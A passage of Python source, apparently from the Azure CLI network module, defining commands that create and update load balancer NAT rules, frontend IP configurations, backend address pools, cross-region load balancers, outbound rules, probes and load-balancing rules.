properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def list_load_balancer_nic(cmd, resource_group_name, load_balancer_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_network_interfaces
return client.list(resource_group_name, load_balancer_name)
def create_lb_inbound_nat_rule(
cmd, resource_group_name, load_balancer_name, item_name, protocol, backend_port, frontend_port=None,
frontend_ip_name=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
frontend_port_range_start=None, frontend_port_range_end=None, backend_pool_name=None):
InboundNatRule, SubResource = cmd.get_models('InboundNatRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) # pylint: disable=no-member
new_rule = InboundNatRule(
name=item_name, protocol=protocol,
frontend_port=frontend_port, backend_port=backend_port,
frontend_ip_configuration=frontend_ip,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
if frontend_port_range_end and cmd.supported_api_version('2021-03-01'):
new_rule.frontend_port_range_end = frontend_port_range_end
if frontend_port_range_start and cmd.supported_api_version('2021-03-01'):
new_rule.frontend_port_range_start = frontend_port_range_start
if backend_pool_name and cmd.supported_api_version('2021-03-01'):
backend_pool_id = get_property(lb.backend_address_pools, backend_pool_name).id
new_rule.backend_address_pool = SubResource(id=backend_pool_id)
upsert_to_collection(lb, 'inbound_nat_rules', new_rule, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_rules, item_name)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get(client, resource_group_name, load_balancer_name):
lb = client.get(resource_group_name, load_balancer_name)
return lb_get_operation(lb)
# workaround for : https://github.com/Azure/azure-cli/issues/17071
def lb_get_operation(lb):
for item in lb.frontend_ip_configurations:
if item.zones is not None and len(item.zones) >= 3 and item.subnet is None:
item.zones = None
return lb
def set_lb_inbound_nat_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None,
frontend_port_range_start=None, frontend_port_range_end=None):
if frontend_ip_name:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
if frontend_port_range_start is not None and cmd.supported_api_version('2021-03-01'):
instance.frontend_port_range_start = frontend_port_range_start
if frontend_port_range_end is not None and cmd.supported_api_version('2021-03-01'):
instance.frontend_port_range_end = frontend_port_range_end
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_floating_ip', floating_ip)
return parent
def create_lb_inbound_nat_pool(
cmd, resource_group_name, load_balancer_name, item_name, protocol, frontend_port_range_start,
frontend_port_range_end, backend_port, frontend_ip_name=None, enable_tcp_reset=None,
floating_ip=None, idle_timeout=None):
InboundNatPool = cmd.get_models('InboundNatPool')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
frontend_ip = get_property(lb.frontend_ip_configurations, frontend_ip_name) \
if frontend_ip_name else None
new_pool = InboundNatPool(
name=item_name,
protocol=protocol,
frontend_ip_configuration=frontend_ip,
frontend_port_range_start=frontend_port_range_start,
frontend_port_range_end=frontend_port_range_end,
backend_port=backend_port,
enable_tcp_reset=enable_tcp_reset,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout)
upsert_to_collection(lb, 'inbound_nat_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().inbound_nat_pools, item_name)
def set_lb_inbound_nat_pool(
cmd, instance, parent, item_name, protocol=None,
frontend_port_range_start=None, frontend_port_range_end=None, backend_port=None,
frontend_ip_name=None, enable_tcp_reset=None, floating_ip=None, idle_timeout=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port_range_start', frontend_port_range_start)
c.set_param('frontend_port_range_end', frontend_port_range_end)
c.set_param('backend_port', backend_port)
c.set_param('enable_floating_ip', floating_ip)
c.set_param('idle_timeout_in_minutes', idle_timeout)
if enable_tcp_reset is not None:
instance.enable_tcp_reset = enable_tcp_reset
if frontend_ip_name == '':
instance.frontend_ip_configuration = None
elif frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
return parent
def create_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, subnet=None, virtual_network_name=None, private_ip_address=None,
private_ip_address_version=None, private_ip_address_allocation=None, zone=None):
FrontendIPConfiguration, SubResource, Subnet = cmd.get_models(
'FrontendIPConfiguration', 'SubResource', 'Subnet')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
if private_ip_address_allocation is None:
private_ip_address_allocation = 'static' if private_ip_address else 'dynamic'
new_config = FrontendIPConfiguration(
name=item_name,
private_ip_address=private_ip_address,
private_ip_address_version=private_ip_address_version,
private_ip_allocation_method=private_ip_address_allocation,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None,
subnet=Subnet(id=subnet) if subnet else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def update_lb_frontend_ip_configuration_setter(cmd, resource_group_name, load_balancer_name, parameters, gateway_lb):
aux_subscriptions = []
if is_valid_resource_id(gateway_lb):
aux_subscriptions.append(parse_resource_id(gateway_lb)['subscription'])
client = network_client_factory(cmd.cli_ctx, aux_subscriptions=aux_subscriptions).load_balancers
return client.begin_create_or_update(resource_group_name, load_balancer_name, parameters)
def set_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, private_ip_address=None,
private_ip_address_allocation=None, public_ip_address=None,
subnet=None, virtual_network_name=None, public_ip_prefix=None, gateway_lb=None):
PublicIPAddress, Subnet, SubResource = cmd.get_models('PublicIPAddress', 'Subnet', 'SubResource')
if not private_ip_address:
instance.private_ip_allocation_method = 'dynamic'
instance.private_ip_address = None
elif private_ip_address is not None:
instance.private_ip_allocation_method = 'static'
instance.private_ip_address = private_ip_address
# Doesn't support update operation for now
# if cmd.supported_api_version(min_api='2019-04-01'):
# instance.private_ip_address_version = private_ip_address_version
if subnet == '':
instance.subnet = None
elif subnet is not None:
instance.subnet = Subnet(id=subnet)
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
if gateway_lb is not None:
instance.gateway_load_balancer = None if gateway_lb == '' else SubResource(id=gateway_lb)
return parent
def _process_vnet_name_and_id(vnet, cmd, resource_group_name):
if vnet and not is_valid_resource_id(vnet):
vnet = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet)
return vnet
def _process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name):
if subnet and not is_valid_resource_id(subnet):
vnet = _process_vnet_name_and_id(vnet, cmd, resource_group_name)
if vnet is None:
raise UnrecognizedArgumentError('vnet should be provided when input subnet name instead of subnet id')
subnet = vnet + f'/subnets/{subnet}'
return subnet
# pylint: disable=too-many-branches
def create_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
vnet=None, backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
(BackendAddressPool,
LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
# Before 2020-03-01, service doesn't support the other rest method.
# We have to use old one to keep backward compatibility.
# Same for basic sku. service refuses that basic sku lb call the other rest method.
if cmd.supported_api_version(max_api='2020-03-01') or lb.sku.name.lower() == 'basic':
new_pool = BackendAddressPool(name=backend_address_pool_name)
upsert_to_collection(lb, 'backend_address_pools', new_pool, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().backend_address_pools, backend_address_pool_name)
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
for addr in addresses_pool:
if 'virtual_network' not in addr and vnet:
addr['virtual_network'] = vnet
# pylint: disable=line-too-long
if cmd.supported_api_version(min_api='2020-11-01'): # pylint: disable=too-many-nested-blocks
try:
if addresses_pool:
new_addresses = []
for addr in addresses_pool:
# vnet | subnet | status
# name/id | name/id/null | ok
# null | id | ok
if 'virtual_network' in addr:
address = LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
subnet=Subnet(id=_process_subnet_name_and_id(addr['subnet'], addr['virtual_network'], cmd, resource_group_name)) if 'subnet' in addr else None,
ip_address=addr['ip_address'])
elif 'subnet' in addr and is_valid_resource_id(addr['subnet']):
address = LoadBalancerBackendAddress(name=addr['name'],
subnet=Subnet(id=addr['subnet']),
ip_address=addr['ip_address'])
else:
raise KeyError
new_addresses.append(address)
else:
new_addresses = None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet '
'name | subnet id) information.')
else:
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
ip_address=addr['ip_address']) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, vnet and ip-address information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
# when sku is 'gateway', 'tunnelInterfaces' can't be None. Otherwise service will response error
if cmd.supported_api_version(min_api='2021-02-01') and lb.sku.name.lower() == 'gateway':
GatewayLoadBalancerTunnelInterface = cmd.get_models('GatewayLoadBalancerTunnelInterface')
new_pool.tunnel_interfaces = [
GatewayLoadBalancerTunnelInterface(type='Internal', protocol='VXLAN', identifier=900)]
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
def set_lb_backend_address_pool(cmd, instance, resource_group_name, vnet=None, backend_addresses=None,
backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
(LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
for addr in addresses_pool:
if 'virtual_network' not in addr and vnet:
addr['virtual_network'] = vnet
# pylint: disable=line-too-long
if cmd.supported_api_version(min_api='2020-11-01'): # pylint: disable=too-many-nested-blocks
try:
if addresses_pool:
new_addresses = []
for addr in addresses_pool:
# vnet | subnet | status
# name/id | name/id/null | ok
# null | id | ok
if 'virtual_network' in addr:
address = LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
subnet=Subnet(id=_process_subnet_name_and_id(addr['subnet'], addr['virtual_network'], cmd, resource_group_name)) if 'subnet' in addr else None,
ip_address=addr['ip_address'])
elif 'subnet' in addr and is_valid_resource_id(addr['subnet']):
address = LoadBalancerBackendAddress(name=addr['name'],
subnet=Subnet(id=addr['subnet']),
ip_address=addr['ip_address'])
else:
raise KeyError
new_addresses.append(address)
else:
new_addresses = None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet '
'name | subnet id) information.')
else:
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
virtual_network=VirtualNetwork(id=_process_vnet_name_and_id(addr['virtual_network'], cmd, resource_group_name)),
ip_address=addr['ip_address']) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise UnrecognizedArgumentError('Each backend address must have name, vnet and ip-address information.')
if new_addresses:
instance.load_balancer_backend_addresses = new_addresses
return instance
def delete_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name):
from azure.cli.core.commands import LongRunningOperation
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
def delete_basic_lb_backend_address_pool():
new_be_pools = [pool for pool in lb.backend_address_pools
if pool.name.lower() != backend_address_pool_name.lower()]
lb.backend_address_pools = new_be_pools
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
result = LongRunningOperation(cmd.cli_ctx)(poller).backend_address_pools
if next((x for x in result if x.name.lower() == backend_address_pool_name.lower()), None):
raise CLIError("Failed to delete '{}' on '{}'".format(backend_address_pool_name, load_balancer_name))
if lb.sku.name.lower() == 'basic':
delete_basic_lb_backend_address_pool()
return None
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
# region cross-region lb
def create_cross_region_load_balancer(cmd, load_balancer_name, resource_group_name, location=None, tags=None,
backend_pool_name=None, frontend_ip_name='LoadBalancerFrontEnd',
public_ip_address=None, public_ip_address_allocation=None,
public_ip_dns_name=None, public_ip_address_type=None, validate=False,
no_wait=False, frontend_ip_zone=None, public_ip_zone=None):
from azure.cli.core.util import random_string
from azure.cli.core.commands.arm import ArmTemplateBuilder
from azure.cli.command_modules.network._template_builder import (
build_load_balancer_resource, build_public_ip_resource)
DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
IPAllocationMethod = cmd.get_models('IPAllocationMethod')
sku = 'standard'
tier = 'Global'
tags = tags or {}
public_ip_address = public_ip_address or 'PublicIP{}'.format(load_balancer_name)
backend_pool_name = backend_pool_name or '{}bepool'.format(load_balancer_name)
if not public_ip_address_allocation:
public_ip_address_allocation = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
# Build up the ARM template
master_template = ArmTemplateBuilder()
lb_dependencies = []
public_ip_id = public_ip_address if is_valid_resource_id(public_ip_address) else None
network_id_template = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network')
if public_ip_address_type == 'new':
lb_dependencies.append('Microsoft.Network/publicIpAddresses/{}'.format(public_ip_address))
master_template.add_resource(build_public_ip_resource(cmd, public_ip_address, location,
tags,
public_ip_address_allocation,
public_ip_dns_name,
sku, public_ip_zone, tier))
public_ip_id = '{}/publicIPAddresses/{}'.format(network_id_template,
public_ip_address)
load_balancer_resource = build_load_balancer_resource(
cmd, load_balancer_name, location, tags, backend_pool_name, frontend_ip_name,
public_ip_id, None, None, None, sku, frontend_ip_zone, None, tier)
load_balancer_resource['dependsOn'] = lb_dependencies
master_template.add_resource(load_balancer_resource)
master_template.add_output('loadBalancer', load_balancer_name, output_type='object')
template = master_template.build()
# deploy ARM template
deployment_name = 'lb_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters={}, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def create_cross_region_lb_frontend_ip_configuration(
cmd, resource_group_name, load_balancer_name, item_name, public_ip_address=None,
public_ip_prefix=None, zone=None):
FrontendIPConfiguration, SubResource = cmd.get_models(
'FrontendIPConfiguration', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_config = FrontendIPConfiguration(
name=item_name,
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
public_ip_prefix=SubResource(id=public_ip_prefix) if public_ip_prefix else None)
if zone and cmd.supported_api_version(min_api='2017-06-01'):
new_config.zones = zone
upsert_to_collection(lb, 'frontend_ip_configurations', new_config, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().frontend_ip_configurations, item_name)
def set_cross_region_lb_frontend_ip_configuration(
cmd, instance, parent, item_name, public_ip_address=None, public_ip_prefix=None):
PublicIPAddress, SubResource = cmd.get_models('PublicIPAddress', 'SubResource')
if public_ip_address == '':
instance.public_ip_address = None
elif public_ip_address is not None:
instance.public_ip_address = PublicIPAddress(id=public_ip_address)
if public_ip_prefix:
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return parent
def create_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
backend_addresses=None, backend_addresses_config_file=None):
if backend_addresses and backend_addresses_config_file:
raise CLIError('usage error: Only one of --backend-address and --backend-addresses-config-file can be provided at the same time.') # pylint: disable=line-too-long
if backend_addresses_config_file:
if not isinstance(backend_addresses_config_file, list):
raise CLIError('Config file must be a list. Please see example as a reference.')
for addr in backend_addresses_config_file:
if not isinstance(addr, dict):
raise CLIError('Each address in config file must be a dictionary. Please see example as a reference.')
ncf = network_client_factory(cmd.cli_ctx)
(BackendAddressPool,
LoadBalancerBackendAddress,
FrontendIPConfiguration) = cmd.get_models('BackendAddressPool',
'LoadBalancerBackendAddress',
'FrontendIPConfiguration')
addresses_pool = []
if backend_addresses:
addresses_pool.extend(backend_addresses)
if backend_addresses_config_file:
addresses_pool.extend(backend_addresses_config_file)
# pylint: disable=line-too-long
try:
new_addresses = [LoadBalancerBackendAddress(name=addr['name'],
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=addr['frontend_ip_address'])) for addr in addresses_pool] if addresses_pool else None
except KeyError:
raise CLIError('Each backend address must have name and frontend_ip_configuration information.')
new_pool = BackendAddressPool(name=backend_address_pool_name,
load_balancer_backend_addresses=new_addresses)
return ncf.load_balancer_backend_address_pools.begin_create_or_update(resource_group_name,
load_balancer_name,
backend_address_pool_name,
new_pool)
def delete_cross_region_lb_backend_address_pool(cmd, resource_group_name, load_balancer_name, backend_address_pool_name): # pylint: disable=line-too-long
ncf = network_client_factory(cmd.cli_ctx)
return ncf.load_balancer_backend_address_pools.begin_delete(resource_group_name,
load_balancer_name,
backend_address_pool_name)
def add_cross_region_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name, frontend_ip_address):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
# pylint: disable=line-too-long
(LoadBalancerBackendAddress, FrontendIPConfiguration) = cmd.get_models('LoadBalancerBackendAddress', 'FrontendIPConfiguration')
new_address = LoadBalancerBackendAddress(name=address_name,
load_balancer_frontend_ip_configuration=FrontendIPConfiguration(id=frontend_ip_address) if frontend_ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def create_cross_region_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
name=item_name,
protocol=protocol,
frontend_port=frontend_port,
backend_port=backend_port,
frontend_ip_configuration=get_property(lb.frontend_ip_configurations,
frontend_ip_name),
backend_address_pool=get_property(lb.backend_address_pools,
backend_address_pool_name),
probe=get_property(lb.probes, probe_name) if probe_name else None,
load_distribution=load_distribution,
enable_floating_ip=floating_ip,
idle_timeout_in_minutes=idle_timeout,
enable_tcp_reset=enable_tcp_reset)
if backend_pools_name:
new_rule.backend_address_pools = [get_property(lb.backend_address_pools, i) for i in backend_pools_name]
upsert_to_collection(lb, 'load_balancing_rules', new_rule, 'name')
poller = cached_put(cmd, ncf.load_balancers.begin_create_or_update, lb, resource_group_name, load_balancer_name)
return get_property(poller.result().load_balancing_rules, item_name)
def set_cross_region_lb_rule(
cmd, instance, parent, item_name, protocol=None, frontend_port=None,
frontend_ip_name=None, backend_port=None, backend_address_pool_name=None, probe_name=None,
load_distribution=None, floating_ip=None, idle_timeout=None, enable_tcp_reset=None, backend_pools_name=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('frontend_port', frontend_port)
c.set_param('backend_port', backend_port)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('load_distribution', load_distribution)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('enable_floating_ip', floating_ip)
if frontend_ip_name is not None:
instance.frontend_ip_configuration = \
get_property(parent.frontend_ip_configurations, frontend_ip_name)
if backend_address_pool_name is not None:
instance.backend_address_pool = \
get_property(parent.backend_address_pools, backend_address_pool_name)
# To keep compatible when bump version from '2020-11-01' to '2021-02-01'
# https://github.com/Azure/azure-rest-api-specs/issues/14430
if cmd.supported_api_version(min_api='2021-02-01') and not backend_pools_name:
instance.backend_address_pools = [instance.backend_address_pool]
if backend_pools_name is not None:
instance.backend_address_pools = [get_property(parent.backend_address_pools, i) for i in backend_pools_name]
if probe_name == '':
instance.probe = None
elif probe_name is not None:
instance.probe = get_property(parent.probes, probe_name)
return parent
# endregion
# pylint: disable=line-too-long
def add_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name, backend_address_pool_name,
address_name, ip_address, vnet=None, subnet=None):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
(LoadBalancerBackendAddress,
Subnet,
VirtualNetwork) = cmd.get_models('LoadBalancerBackendAddress',
'Subnet',
'VirtualNetwork')
if cmd.supported_api_version(min_api='2020-11-01'):
if vnet:
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=_process_subnet_name_and_id(subnet, vnet, cmd, resource_group_name)) if subnet else None,
virtual_network=VirtualNetwork(id=vnet),
ip_address=ip_address if ip_address else None)
elif is_valid_resource_id(subnet):
new_address = LoadBalancerBackendAddress(name=address_name,
subnet=Subnet(id=subnet),
ip_address=ip_address if ip_address else None)
else:
raise UnrecognizedArgumentError('Each backend address must have name, ip-address, (vnet name and subnet name | subnet id) information.')
else:
new_address = LoadBalancerBackendAddress(name=address_name,
virtual_network=VirtualNetwork(id=vnet) if vnet else None,
ip_address=ip_address if ip_address else None)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
address_pool.load_balancer_backend_addresses.append(new_address)
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def remove_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name, address_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
if address_pool.load_balancer_backend_addresses is None:
address_pool.load_balancer_backend_addresses = []
lb_addresses = [addr for addr in address_pool.load_balancer_backend_addresses if addr.name != address_name]
address_pool.load_balancer_backend_addresses = lb_addresses
return client.begin_create_or_update(resource_group_name, load_balancer_name,
backend_address_pool_name, address_pool)
def list_lb_backend_address_pool_address(cmd, resource_group_name, load_balancer_name,
backend_address_pool_name):
client = network_client_factory(cmd.cli_ctx).load_balancer_backend_address_pools
address_pool = client.get(resource_group_name, load_balancer_name, backend_address_pool_name)
return address_pool.load_balancer_backend_addresses
def create_lb_outbound_rule(cmd, resource_group_name, load_balancer_name, item_name,
backend_address_pool, frontend_ip_configurations, protocol,
outbound_ports=None, enable_tcp_reset=None, idle_timeout=None):
OutboundRule, SubResource = cmd.get_models('OutboundRule', 'SubResource')
client = network_client_factory(cmd.cli_ctx).load_balancers
lb = lb_get(client, resource_group_name, load_balancer_name)
rule = OutboundRule(
protocol=protocol, enable_tcp_reset=enable_tcp_reset, idle_timeout_in_minutes=idle_timeout,
backend_address_pool=SubResource(id=backend_address_pool),
frontend_ip_configurations=[SubResource(id=x) for x in frontend_ip_configurations]
if frontend_ip_configurations else None,
allocated_outbound_ports=outbound_ports, name=item_name)
upsert_to_collection(lb, 'outbound_rules', rule, 'name')
poller = client.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().outbound_rules, item_name)
def set_lb_outbound_rule(instance, cmd, parent, item_name, protocol=None, outbound_ports=None,
idle_timeout=None, frontend_ip_configurations=None, enable_tcp_reset=None,
backend_address_pool=None):
SubResource = cmd.get_models('SubResource')
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('allocated_outbound_ports', outbound_ports)
c.set_param('idle_timeout_in_minutes', idle_timeout)
c.set_param('enable_tcp_reset', enable_tcp_reset)
c.set_param('backend_address_pool', SubResource(id=backend_address_pool)
if backend_address_pool else None)
c.set_param('frontend_ip_configurations',
[SubResource(id=x) for x in frontend_ip_configurations] if frontend_ip_configurations else None)
return parent
def create_lb_probe(cmd, resource_group_name, load_balancer_name, item_name, protocol, port,
path=None, interval=None, threshold=None):
Probe = cmd.get_models('Probe')
ncf = network_client_factory(cmd.cli_ctx)
lb = lb_get(ncf.load_balancers, resource_group_name, load_balancer_name)
new_probe = Probe(
protocol=protocol, port=port, interval_in_seconds=interval, number_of_probes=threshold,
request_path=path, name=item_name)
upsert_to_collection(lb, 'probes', new_probe, 'name')
poller = ncf.load_balancers.begin_create_or_update(resource_group_name, load_balancer_name, lb)
return get_property(poller.result().probes, item_name)
def set_lb_probe(cmd, instance, parent, item_name, protocol=None, port=None,
path=None, interval=None, threshold=None):
with cmd.update_context(instance) as c:
c.set_param('protocol', protocol)
c.set_param('port', port)
c.set_param('request_path', path)
c.set_param('interval_in_seconds', interval)
c.set_param('number_of_probes', threshold)
return parent
def create_lb_rule(
cmd, resource_group_name, load_balancer_name, item_name,
protocol, frontend_port, backend_port, frontend_ip_name=None,
backend_address_pool_name=None, probe_name=None, load_distribution='default',
floating_ip=None, idle_timeout=None, enable_tcp_reset=None, disable_outbound_snat=None, backend_pools_name=None):
LoadBalancingRule = cmd.get_models('LoadBalancingRule')
ncf = network_client_factory(cmd.cli_ctx)
lb = cached_get(cmd, ncf.load_balancers.get, resource_group_name, load_balancer_name)
lb = lb_get_operation(lb)
if not frontend_ip_name:
frontend_ip_name = _get_default_name(lb, 'frontend_ip_configurations', '--frontend-ip-name')
# avoid break when backend_address_pool_name is None and backend_pools_name is not None
if not backend_address_pool_name and backend_pools_name:
backend_address_pool_name = backend_pools_name[0]
if not backend_address_pool_name:
backend_address_pool_name = _get_default_name(lb, 'backend_address_pools', '--backend-pool-name')
new_rule = LoadBalancingRule(
